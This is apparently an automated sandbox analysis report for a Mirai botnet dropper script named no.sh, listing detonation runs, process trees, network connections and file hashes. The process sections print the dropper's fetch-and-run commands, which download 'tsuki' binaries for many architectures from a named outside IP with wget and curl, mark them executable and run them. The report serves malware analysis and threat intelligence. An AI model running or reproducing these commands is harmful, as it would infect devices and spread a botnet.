Malware Analysis Report

2024-10-10 11:00

Sample ID 240722-aja8yasapc
Target no.sh
SHA256 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
Tags
mirai mirai botnet antivm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae

Threat Level: Known bad

The file no.sh was found to be: Known bad.

Malicious Activity Summary

mirai mirai botnet antivm

Mirai

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-22 00:14

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-22 00:14

Reported

2024-07-22 00:16

Platform

debian9-mipsel-20240418-en

Max time kernel

69s

Max time network

71s

Command Line

[/tmp/no.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tsuki.spc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.i686 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/curl N/A
File opened for modification /tmp/tsuki /tmp/no.sh N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm5 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm6 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/wget N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/wget N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mips /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/curl N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mips /usr/bin/curl N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/curl N/A

Processes

/tmp/no.sh

[/tmp/no.sh]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.x86]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.x86]

/bin/cat

[cat tsuki.x86]

/bin/chmod

[chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mips]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mips]

/bin/cat

[cat tsuki.mips]

/bin/chmod

[chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.mips tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mpsl]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mpsl]

/bin/cat

[cat tsuki.mpsl]

/bin/chmod

[chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm]

/bin/cat

[cat tsuki.arm]

/bin/chmod

[chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm5]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm5]

/bin/cat

[cat tsuki.arm5]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm6]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm6]

/bin/cat

[cat tsuki.arm6]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm7]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm7]

/bin/cat

[cat tsuki.arm7]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.ppc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.ppc]

/bin/cat

[cat tsuki.ppc]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.m68k]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.m68k]

/bin/cat

[cat tsuki.m68k]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.spc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.spc]

/bin/cat

[cat tsuki.spc]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.i686]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.i686]

/bin/cat

[cat tsuki.i686]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.sh4]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.sh4]

/bin/cat

[cat tsuki.sh4]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arc]

/bin/cat

[cat tsuki.arc]

/bin/chmod

[chmod +x no.sh tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

Network

Country Destination Domain Proto
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp

Files

/tmp/tsuki.x86

MD5 f60ada8b79c2232773b9c08868c1c5fb
SHA1 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa
SHA256 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117
SHA512 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8

/tmp/tsuki

MD5 6cf78b3572c325d809ad4677c2ebd6a2
SHA1 be2f27c2b001f981344e52333568cb0dc7ffe7ad
SHA256 c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0
SHA512 bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24

/tmp/tsuki

MD5 2cf4b7e9a6fa11dbff627fc7aeee3f97
SHA1 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb
SHA256 eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d
SHA512 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57

/tmp/tsuki

MD5 3cd8418ac8f414def6727fe141d328b9
SHA1 dc61b74e9e08ff3208ee96a6c94f8247e6196b99
SHA256 cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3
SHA512 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9

/tmp/tsuki

MD5 eeed291445ee3e6bac53540dfd6cd91c
SHA1 afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41
SHA256 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78
SHA512 ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283

/tmp/tsuki

MD5 adf30c84e4d1a741bb51593fa750d624
SHA1 ca52225d16c403e9e6ab662e8dab63496281945d
SHA256 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806
SHA512 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-22 00:14

Reported

2024-07-22 00:16

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

17s

Max time network

131s

Command Line

[/tmp/no.sh]

Signatures

Mirai

botnet mirai

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A
N/A /tmp/tsuki /tmp/tsuki N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tsuki.mpsl /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm5 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm6 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.i686 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mpsl /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/curl N/A
File opened for modification /tmp/tsuki.spc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.x86 /usr/bin/curl N/A
File opened for modification /tmp/tsuki /tmp/no.sh N/A
File opened for modification /tmp/tsuki.mips /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm /usr/bin/wget N/A
File opened for modification /tmp/tsuki.arm /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arm7 /usr/bin/wget N/A
File opened for modification /tmp/tsuki.mips /usr/bin/wget N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/wget N/A
File opened for modification /tmp/tsuki.ppc /usr/bin/curl N/A
File opened for modification /tmp/tsuki.m68k /usr/bin/wget N/A
File opened for modification /tmp/tsuki.sh4 /usr/bin/curl N/A
File opened for modification /tmp/tsuki.arc /usr/bin/curl N/A

Processes

/tmp/no.sh

[/tmp/no.sh]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.x86]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.x86]

/bin/cat

[cat tsuki.x86]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mips]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mips]

/bin/cat

[cat tsuki.mips]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.mips tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.mpsl]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.mpsl]

/bin/cat

[cat tsuki.mpsl]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm]

/bin/cat

[cat tsuki.arm]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm5]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm5]

/bin/cat

[cat tsuki.arm5]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm6]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm6]

/bin/cat

[cat tsuki.arm6]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arm7]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arm7]

/bin/cat

[cat tsuki.arm7]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.ppc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.ppc]

/bin/cat

[cat tsuki.ppc]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.m68k]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.m68k]

/bin/cat

[cat tsuki.m68k]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.spc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.spc]

/bin/cat

[cat tsuki.spc]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.i686]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.i686]

/bin/cat

[cat tsuki.i686]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.sh4]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.sh4]

/bin/cat

[cat tsuki.sh4]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

/usr/bin/wget

[wget http://176.123.2.219/bins/tsuki.arc]

/usr/bin/curl

[curl -O http://176.123.2.219/bins/tsuki.arc]

/bin/cat

[cat tsuki.arc]

/bin/chmod

[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]

/tmp/tsuki

[./tsuki payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
US 151.101.193.91:443 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
GB 89.187.167.8:443 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.61:443 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp
MD 176.123.2.219:80 176.123.2.219 tcp

Files

/tmp/tsuki.x86

MD5 f60ada8b79c2232773b9c08868c1c5fb
SHA1 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa
SHA256 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117
SHA512 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8

/tmp/tsuki

MD5 6cf78b3572c325d809ad4677c2ebd6a2
SHA1 be2f27c2b001f981344e52333568cb0dc7ffe7ad
SHA256 c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0
